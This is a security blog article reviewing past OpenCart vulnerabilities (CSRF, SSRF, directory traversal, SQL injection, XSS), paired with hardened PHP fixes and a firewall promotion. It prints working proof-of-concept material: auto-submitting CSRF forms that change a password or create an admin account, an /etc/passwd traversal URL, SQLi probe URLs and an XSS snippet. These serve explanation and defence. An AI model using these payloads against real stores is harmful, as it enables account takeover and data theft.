5 important OpenCart security issues

OpenCart security issues matter now because around 4 million websites are actively using it.

Introduction to OpenCart e-commerce platform

OpenCart is an easy-to-use, dynamic PHP-based open source online store management system. Being economical and open source, it is an advantage for e-commerce start-ups. According to BuiltWith, 442,897 sites are presently using OpenCart for e-commerce. With popularity, OpenCart has also gained the attention of hackers and cyber criminals. This article is about the OpenCart security issues that OpenCart faces at present, and we will also discuss solutions to mitigate these security threats.

Attackers have exploited OpenCart frequently. Consequently, OpenCart security has become one of the most discussed subjects among the professionals who are assigned to protect these platforms from attackers. Let us study some of the typical OpenCart security issues, get to know their tell-tale signs, and then discuss some of the safety measures.

1. OpenCart Security Issues: Cross-Site Request Forgery

In 2010 and 2018, OpenCart versions 1.4 and 3.0.2.0 respectively were found to have a Cross-Site Request Forgery vulnerability, one of the more severe OpenCart security issues. In OpenCart 3.0.2.0, /upload/catalog/controller/account/password.php can be reached through a cross-site request forgery attack. The attacker needs to target index.php as index.php?route=account/password, which routes the request to the password controller. A forged request to this controller can change a logged-in user's password. A sample page for this OpenCart security issue is:

<html>
<body>
    <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="password" value="CK01ck01" />
        <input type="hidden" name="confirm" value="CK01ck01" />
        <script>document.getElementById('post123').submit();</script>
    </form>
</body>
</html>

In OpenCart version 1.4 (2010), due to a CSRF vulnerability in index.php, remote attackers could hijack the authentication of an administrator and use their privileges. By setting the POST request's route parameter to "user/user/insert", the attacker could have an administrative account created. For better understanding, a sample script is attached which performs CSRF by forging that POST request.

<html>
<head>
    <title>OpenCart CSRF Vulnerability</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script type="text/javascript">
    function csrfInjection()
    {
        var params = {
            'username'      : 'an_attacker',
            'firstname'     : 'attack',
            'lastname'      : 'user',
            'email'         : 'some.user (at) randomatackerdomain (dot) com [email concealed]',
            'user_group_id' : '1', // Default group id for administrator level is 1
            'password'      : 'test',
            'confirm'       : 'test',
            'status'        : '1'
        };

        var form = document.createElement("form");
        form.setAttribute("method", "post");
        form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

        for (var key in params)
        {
            var hiddenField = document.createElement("input");
            hiddenField.setAttribute("type", "hidden");
            hiddenField.setAttribute("name", key);
            hiddenField.setAttribute("value", params[key]);
            form.appendChild(hiddenField);
        }

        attack_result.document.body.appendChild(form);
        form.submit();
    }
    </script>
</head>
<body>
    OpenCart CSRF Vulnerability
    <input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
    <a href="#" onclick="csrfInjection();return false;">Add User</a>
    <p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
    <iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>
</body>
</html>
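Both forged pages above work because the browser attaches the victim's session cookie to a POST that the site cannot tell apart from one of its own forms. The standard defence is a per-session synchronizer token that the attacker's page cannot read. The following is an added example, not OpenCart's own code: the `$session` array stands in for OpenCart's session storage, and the function names are this example's own.

```php
<?php
// Added example (not OpenCart's own code): a synchronizer-token check for a
// state-changing form such as account/password. $session stands in for
// OpenCart's session storage; function names are this example's own.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';

// Issue (or reuse) one unguessable token per session and embed it in every POST form.
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session[CSRF_SESSION_KEY];
}

// Verify the submitted token before acting. hash_equals() is constant-time;
// a missing or mismatched token rejects the request.
function csrf_verify(array $session, $submitted): bool
{
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// What a hardened password controller does with a POST body.
function handle_password_change(array &$session, array $post): string
{
    if (!csrf_verify($session, $post['csrf_token'] ?? null)) {
        return 'rejected: missing or invalid CSRF token';
    }
    $password = $post['password'] ?? '';
    if ($password === '' || $password !== ($post['confirm'] ?? null)) {
        return 'rejected: passwords missing or do not match';
    }
    return 'ok: password updated for customer ' . $session['customer_id'];
}

// Constructed sample session and requests.
$session = ['customer_id' => 42];

// Legitimate request: the form rendered by the store carried the session token.
$legit = ['password' => 'N3w-pass', 'confirm' => 'N3w-pass', 'csrf_token' => csrf_token($session)];
echo handle_password_change($session, $legit), PHP_EOL;   // ok: ...

// Forged request like the auto-submitting form above: the attacker's page
// cannot read the victim's token, so the field is absent and the request fails.
$forged = ['password' => 'CK01ck01', 'confirm' => 'CK01ck01'];
echo handle_password_change($session, $forged), PHP_EOL;  // rejected: ...
```

The token must be emitted into every form as a hidden field and also checked on every other state-changing route (the user/user/insert example above included). Setting the session cookie with `SameSite=Lax` via `session_set_cookie_params()` (PHP 7.3 and later) adds a second layer, since the browser then withholds the cookie from cross-site POSTs.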

2. OpenCart Security Issues: Server Side Request Forgery

As a variation on the CSRF attacks, a Server Side Request Forgery was also reported in 2014 in OpenCart 1.5.6.4. This OpenCart security issue was found in the Cart::getProducts method in system/library/cart.php. A sample vulnerable code snippet from the getProducts function of the Cart class is as follows:

foreach ($this->session->data['cart'] as $key => $quantity) {
    $product = explode(':', $key);

    $product_id = $product[0];

    $stock = true;

    // Options
    if (!empty($product[1])) {
        $options = unserialize(base64_decode($product[1]));
    } else {
        $options = array();
    }

In this code snippet, the unserialize method is used to process the keys of the array stored in the $this->session->data['cart'] session variable without proper input validation. Such values can be manipulated by an unauthenticated attacker via the $_POST['quantity'] parameter during an "update" request. This OpenCart security issue can be used to inject arbitrary PHP objects into the application scope and so allow an attacker to conduct Server-Side Request Forgery (SSRF) attacks.
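The root cause is `unserialize()` on client-controlled bytes: whichever class the serialized blob names gets instantiated, and its `__wakeup()` or `__destruct()` runs. The following added example (not OpenCart's own code; function names and sample keys are constructed here) shows the vulnerable parsing beside a hardened version that refuses objects outright and then validates the shape of the decoded options.

```php
<?php
// Added example (not OpenCart's own code): parsing a cart key of the form
// "product_id:base64(serialized options)" without letting the client inject
// PHP objects. Function names and the sample keys are constructed here.

declare(strict_types=1);

// The pattern from the snippet above: unserialize() of client-controlled data.
function parse_cart_key_vulnerable(string $key): array
{
    $parts   = explode(':', $key);
    $options = !empty($parts[1]) ? unserialize(base64_decode($parts[1])) : [];
    return ['product_id' => (int)$parts[0], 'options' => $options];
}

// Option values a storefront stores are scalars or lists of scalars (checkbox options).
function is_plain_option_value($value): bool
{
    if (is_scalar($value)) {
        return true;
    }
    if (!is_array($value)) {
        return false;
    }
    foreach ($value as $item) {
        if (!is_scalar($item)) {
            return false;
        }
    }
    return true;
}

// Hardened: strict base64, allowed_classes => false (any object becomes
// __PHP_Incomplete_Class and no magic method runs), then shape validation.
function parse_cart_key_safe(string $key): ?array
{
    $parts = explode(':', $key, 2);
    if (!ctype_digit($parts[0])) {
        return null;                                    // product id must be numeric
    }
    $options = [];
    if (isset($parts[1]) && $parts[1] !== '') {
        $raw = base64_decode($parts[1], true);          // strict mode rejects non-base64
        if ($raw === false) {
            return null;
        }
        $decoded = @unserialize($raw, ['allowed_classes' => false]);
        if (!is_array($decoded)) {
            return null;                                // objects, scalars, garbage: reject
        }
        foreach ($decoded as $optionId => $value) {
            if (!ctype_digit((string)$optionId) || !is_plain_option_value($value)) {
                return null;
            }
            $options[(int)$optionId] = $value;
        }
    }
    return ['product_id' => (int)$parts[0], 'options' => $options];
}

// Constructed keys: one as the storefront would build it, one carrying a
// serialized object (stdClass here; the 2014 report relied on a class whose
// deserialization has side effects).
$legit   = '17:' . base64_encode(serialize([3 => '12', 5 => ['20', '21']]));
$hostile = '17:' . base64_encode(serialize((object)['url' => 'http://127.0.0.1/']));

var_dump(parse_cart_key_vulnerable($hostile)['options']);  // object(stdClass): the injected object is live
var_dump(parse_cart_key_safe($hostile));                   // NULL: rejected
var_dump(parse_cart_key_safe($legit)['options']);          // array(2) { [3]=>"12", [5]=>array(2) }
```

The `allowed_classes` option requires PHP 7.0 or later. Storing options as JSON (`json_encode`/`json_decode` with `$assoc = true`) removes `unserialize()` from the request path entirely, which is the stronger long-term fix; the shape validation above is still worth keeping in that case.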

3. OpenCart Security Issues: Directory Traversal

In 2009, OpenCart v1.1.8 was reported to have a directory traversal vulnerability in its index.php file. This enabled a remote attacker to read files and folders on the server beyond the website directory. The remote attacker used .. (dot dot) sequences in the route parameter and gained access to the OpenCart server's files. A sample of the exploit for this vulnerability is as follows:

http://[site]/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00

In 2018, OpenCart 3.0.2.0 was reported to have a security issue pertaining to directory traversal. In this version, there is a feature called "program extension upload". It consists of the following steps:

  1. Upload
  2. Install
  3. Unzip
  4. Move
  5. Xml
  6. Remove

Now, if the "Remove" step is skipped, arbitrary code can be executed. This happens because the attacker can discover the name of a secret temporary directory (containing 10 random digits) through a directory traversal attack involving language_info['code'].

In the same version, there is another directory traversal vulnerability in the editDownload function in admin/model/catalog/download.php, reachable via admin/index.php?route=catalog/download/edit. As a consequence, the configuration file of your OpenCart website may be downloaded by the attacker, who may then tamper with it to disrupt your online business.
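All three traversal cases share one defect: a request parameter is joined onto a file-system path without first being constrained. The added example below (not OpenCart's own code) resolves a route parameter in two stages, a strict grammar check and then a `realpath()` containment check against the controller root. The route grammar is this example's assumption about what OpenCart routes look like, and the temporary controller tree is constructed so the script runs stand-alone.

```php
<?php
// Added example (not OpenCart's own code): resolving a "route" request parameter
// to a controller file so that ".." segments, absolute paths and null bytes can
// never escape the controller directory. The route grammar is this example's
// assumption; the temporary directory tree is constructed for the demo.

declare(strict_types=1);

// Step 1: syntactic allow-list. A route is one to three segments of [a-z0-9_]
// joined by "/", e.g. "account/password" or "catalog/download/edit".
function route_is_well_formed(string $route): bool
{
    return preg_match('#\A[a-z0-9_]+(/[a-z0-9_]+){0,2}\z#', $route) === 1;
}

// Step 2: containment. The candidate is canonicalised with realpath() and must
// remain below the controller root; this covers symlinks and any later
// relaxation of the grammar in step 1.
function resolve_controller(string $controllerRoot, string $route): ?string
{
    if (!route_is_well_formed($route)) {
        return null;
    }
    $root = realpath($controllerRoot);
    if ($root === false) {
        return null;
    }
    // The last segment may name a method rather than a file: try "a/b/c.php"
    // first, then "a/b.php".
    $candidates = [$route . '.php'];
    if (substr_count($route, '/') === 2) {
        $candidates[] = dirname($route) . '.php';
    }
    foreach ($candidates as $relative) {
        $file = realpath($root . DIRECTORY_SEPARATOR . $relative);
        if ($file !== false && strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0) {
            return $file;
        }
    }
    return null;
}

// Throwaway controller tree for the demonstration.
$base = sys_get_temp_dir() . '/oc_route_demo_' . bin2hex(random_bytes(4));
$root = $base . '/controller';
mkdir($root . '/account', 0700, true);
file_put_contents($root . '/account/password.php', "<?php // demo controller\n");
file_put_contents($base . '/config.php', "<?php // sits outside the controller root\n");

$requests = [
    'account/password',              // legitimate
    'account/password/save',         // method segment: resolves to account/password.php
    '../config',                     // parent-directory escape: fails the grammar
    '../../../../../../etc/passwd',  // traversal shape from the 2009 report
    "account/password\0",            // embedded null byte: fails the grammar
];
foreach ($requests as $route) {
    $resolved = resolve_controller($root, $route);
    printf("%-32s -> %s\n", addcslashes($route, "\0"),
        $resolved === null ? 'REJECTED' : 'ok: ' . substr($resolved, strlen($root) + 1));
}

// Clean up the demo tree.
unlink($root . '/account/password.php');
unlink($base . '/config.php');
rmdir($root . '/account');
rmdir($root);
rmdir($base);
```

The same two-stage pattern applies to the download and extension-install paths: validate the identifier against the shape you expect (an integer `download_id`, a directory name of exactly ten digits), and then confirm the resolved path still lies under the directory you intended before reading, moving or deleting anything.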

4. OpenCart Security Issues: SQL Injection

One of the most common attacks that PHP-based websites face is SQL injection. There are four OpenCart security issues based on SQL injection. The first was reported in 2009 in OpenCart v1.1.8, which allowed remote attackers to execute arbitrary SQL commands via the order parameter. It was a case of blind SQL injection and arose because the order parameter was not sanitized before use. In this attack, the attacker could craft statements containing the ORDER parameter in SQL and view, add, modify or delete information in OpenCart's back-end database. The information that could be revealed to an attacker included usernames, unsalted MD5 password hashes, payment gateway credentials, etc.

Then in 2010, OpenCart v1.3.2 was again reported to have an SQL injection vulnerability. The page parameter could be exploited via the index.php page of the OpenCart website. Given below are some example URIs that were specially crafted to demonstrate this OpenCart security issue:

http://www.example1.org/index.php?route=product%2Fspecial&path=20&page='
http://www.example2.in/index.php?route=product%2Fspecial&path=20&page='
http://www.example3.com/index.php?route=product%2Fcategory&path=20&page=andres'"

In version 2.3.0.0 of OpenCart, on stores using the Amazon Order Tracking function, an SQL injection vulnerability was detected in upload/admin/model/openbay/amazon.php. This OpenCart security issue enabled remote authenticated administrators to execute arbitrary SQL commands via the courier_id parameter to openbay.php. A code snippet of the updateAmazonOrderTracking function, which takes courier_id as a parameter, is shown as follows:

public function updateAmazonOrderTracking($order_id, $courier_id, $courier_from_list, $tracking_no)
{
    $this->db->query("UPDATE `" . DB_PREFIX . "amazon_order`
        SET `courier_id` = '" . $courier_id . "',
        `courier_other` = " . (int)!$courier_from_list . ",
        `tracking_no` = '" . $tracking_no . "'
        WHERE `order_id` = " . (int)$order_id);
}

The fix escapes the two string values before they are concatenated into the query (the integer fields are already cast with (int)):

        SET `courier_id` = '" . $this->db->escape($courier_id) . "',
        `courier_other` = " . (int)!$courier_from_list . ",
        `tracking_no` = '" . $this->db->escape($tracking_no) . "'

Thus, through this OpenCart security vulnerability, an SQL injection could be performed and the order details of another customer could become accessible to an attacker.

Related article – How to prevent SQL Injection (SQLi) in Opencart 1.5.x/2.x/3.x
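The four cases above fall into two groups: values that can be bound as parameters (page, courier_id, tracking_no) and the ORDER BY column, which no database driver allows you to bind. The added example below (not OpenCart's own code; function names and sample rows are this example's own, and DB_PREFIX is defined only so the script runs stand-alone) handles both: an allow-list for the sort column and a prepared-statement version of updateAmazonOrderTracking, executed against an in-memory SQLite table when the pdo_sqlite extension is present.

```php
<?php
// Added example (not OpenCart's own code): two defences for the injection cases
// above. An ORDER BY column cannot be bound as a statement parameter, so the
// sort/order request values are mapped through an allow-list; the
// updateAmazonOrderTracking query is rewritten with placeholders. Function
// names and sample rows are this example's own; DB_PREFIX is OpenCart's
// constant, defined here only so the script runs stand-alone.

declare(strict_types=1);

if (!defined('DB_PREFIX')) {
    define('DB_PREFIX', 'oc_');
}

// Map a client-supplied sort key to a known column. Anything not in the map
// falls back to the first entry, so request text never reaches the SQL.
function order_by_clause(?string $sort, ?string $order, array $allowedColumns): string
{
    $column    = $allowedColumns[$sort ?? ''] ?? reset($allowedColumns);
    $direction = strtoupper((string)$order) === 'DESC' ? 'DESC' : 'ASC';
    return "ORDER BY {$column} {$direction}";
}

// Prepared-statement form of the tracking update: the SQL carries only
// placeholders; values travel separately and are never concatenated.
function tracking_update(int $orderId, string $courierId, bool $courierFromList, string $trackingNo): array
{
    $sql = 'UPDATE `' . DB_PREFIX . 'amazon_order` '
         . 'SET `courier_id` = :courier_id, `courier_other` = :courier_other, `tracking_no` = :tracking_no '
         . 'WHERE `order_id` = :order_id';
    $params = [
        ':courier_id'    => $courierId,
        ':courier_other' => (int)!$courierFromList,
        ':tracking_no'   => $trackingNo,
        ':order_id'      => $orderId,
    ];
    return [$sql, $params];
}

// ORDER BY: a hostile sort key is simply ignored.
$allowed = ['name' => 'pd.name', 'price' => 'p.price', 'date' => 'p.date_added'];
echo order_by_clause('price', 'desc', $allowed), PHP_EOL;                  // ORDER BY p.price DESC
echo order_by_clause("p.price; DROP TABLE x", 'asc', $allowed), PHP_EOL;   // ORDER BY pd.name ASC

// Prepared update with a courier_id that would have rewritten the WHERE clause
// under string concatenation. Constructed input.
[$sql, $params] = tracking_update(1001, "x', `tracking_no` = 'tampered' WHERE 1 OR '1' = '1", false, 'TRK-1');

if (extension_loaded('pdo_sqlite')) {
    $pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $pdo->exec('CREATE TABLE `' . DB_PREFIX . 'amazon_order` '
             . '(order_id INTEGER, courier_id TEXT, courier_other INTEGER, tracking_no TEXT)');
    $pdo->exec('INSERT INTO `' . DB_PREFIX . "amazon_order` VALUES (1001, '', 0, ''), (1002, 'ups', 0, 'KEEP-ME')");
    $pdo->prepare($sql)->execute($params);
    $rows = $pdo->query('SELECT order_id, courier_id, tracking_no FROM `' . DB_PREFIX . 'amazon_order` ORDER BY order_id');
    foreach ($rows as $row) {
        // Row 1001 stores the hostile string literally; row 1002 is untouched.
        printf("%d | %s | %s\n", $row['order_id'], $row['courier_id'], $row['tracking_no']);
    }
} else {
    echo $sql, PHP_EOL;
}
```

Where a code base must keep OpenCart's `$this->db->query()` string style, the same rule still holds: every string value goes through `$this->db->escape()`, every numeric value through an `(int)` or `(float)` cast, and identifiers (column names, sort direction) come only from a fixed map such as `$allowed` above.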

5. OpenCart Security Issues: Cross-Site Scripting

The first XSS OpenCart security issue was discovered in 2008 in OpenCart v0.7.7. Multiple cross-site scripting (XSS) vulnerabilities were reported in index.php. They enabled attackers to inject malicious web script or HTML through the firstname and search parameters. This OpenCart security issue was the result of improper validation of user-supplied input by the index.php script. A remote attacker could exploit it by placing the firstname or search parameter in a specially crafted URL; the script would then execute in the victim's web browser once the URL was clicked, letting the attacker steal the victim's cookie-based authentication credentials.

In 2015, a similar XSS OpenCart security issue was reported in versions of OpenCart before v2.1.0.2. The vulnerability used the zone_id parameter to inject arbitrary HTML or script into index.php. The affected endpoint and parameter are:

/opencart/index.php?route=account/address/add(zone_id - POST)

Through this vulnerability, an attacker could hijack a user's session, change the logged-in user's password and invalidate the victim's session. Now, if you as an administrator are logged in to your OpenCart website, imagine what a nightmarish experience it would be: the attacker would have full administrative privileges on your website.

In 2018, in OpenCart's Overclocked version below 1.11.1, there was a Cross-Site Scripting (XSS) vulnerability in user input that was not sanitized within a JavaScript function. This could lead to unauthorized actions and data access, theft of session information and denial of service. The exploit consisted of malicious input passed in a GET parameter. A sample of the vulnerable code is:

var token = "<?php echo $_GET['token']; alert(1)?>";
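The three XSS cases differ in where the untrusted value lands: firstname, search and zone_id are echoed into HTML, while the token is echoed into a JavaScript string literal, and each context needs its own encoding. The added example below (not OpenCart's own code; function names and sample inputs are constructed) renders the same template with raw interpolation and with context-aware encoding. It assumes PHP 7.2 or later for the JSON_INVALID_UTF8_SUBSTITUTE flag.

```php
<?php
// Added example (not OpenCart's own code): context-aware output encoding for
// the two XSS shapes above, a value echoed into HTML markup (firstname, search,
// zone_id) and a value echoed into a JavaScript string (the token line).
// Function names and the sample inputs are constructed for this example.

declare(strict_types=1);

// HTML text/attribute context: encode the five significant characters.
function html_safe(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// JavaScript string context: emit a quoted JSON literal and hex-encode
// < > & ' " so that a "</script>" inside the value cannot close the block.
function js_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE
    );
}

// The vulnerable shape from the page: raw interpolation into both contexts.
function render_vulnerable(string $firstname, string $token): string
{
    return "<p>Hello {$firstname}</p>\n<script>var token = \"{$token}\";</script>";
}

// Same template, each value encoded for the context it lands in.
function render_safe(string $firstname, string $token): string
{
    return '<p>Hello ' . html_safe($firstname) . "</p>\n"
         . '<script>var token = ' . js_literal($token) . ';</script>';
}

// Constructed hostile inputs of the kind a crafted URL or POST would carry.
$firstname = '<img src=x onerror=alert(1)>';
$token     = '";alert(1);//';

echo "--- vulnerable ---\n", render_vulnerable($firstname, $token), "\n";
echo "--- hardened ---\n", render_safe($firstname, $token), "\n";
// Hardened output:
// <p>Hello &lt;img src=x onerror=alert(1)&gt;</p>
// <script>var token = "\u0022;alert(1);\/\/";</script>
```

The encoding is applied at output time, not on input, because the same stored value (a customer's first name, say) may later be rendered in HTML, in a JavaScript literal or in an email, and each sink needs a different transformation. A Content-Security-Policy header without `'unsafe-inline'` is a useful second layer for the inline-script case.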

Conclusion: Combating OpenCart Security Issues

In all of these attacks, the vulnerability was caused by code that did not pay heed to data security. Hence, the following are some security measures that you should not ignore:

  • The website administrator should make a thorough check of the various areas of code that deal with user input.
  • They must ensure that whatever data is associated with the website is properly sanitized with the appropriate functions and logic.
  • Data must be properly validated before being passed to back-end servers.
  • The default account credentials should be changed.
  • The plugins, themes and templates used by the website must be kept up to date.

If you find it difficult to keep up with so many steps, you can take professional help. For instance, Astra's Web Application Firewall is a great way to mitigate all these OpenCart security issues. Astra's firewall is known to block CSRF, XSS, SQLi, the OWASP Top 10, bad bots, and 100+ other emerging threats. It also keeps a real-time check and fortifies your OpenCart store against different security issues and malicious attackers.

About Sachin Tiwari
I am a software engineer with an interest in web security and cybersecurity. I love to learn about website security topics and to share what I learn with others.
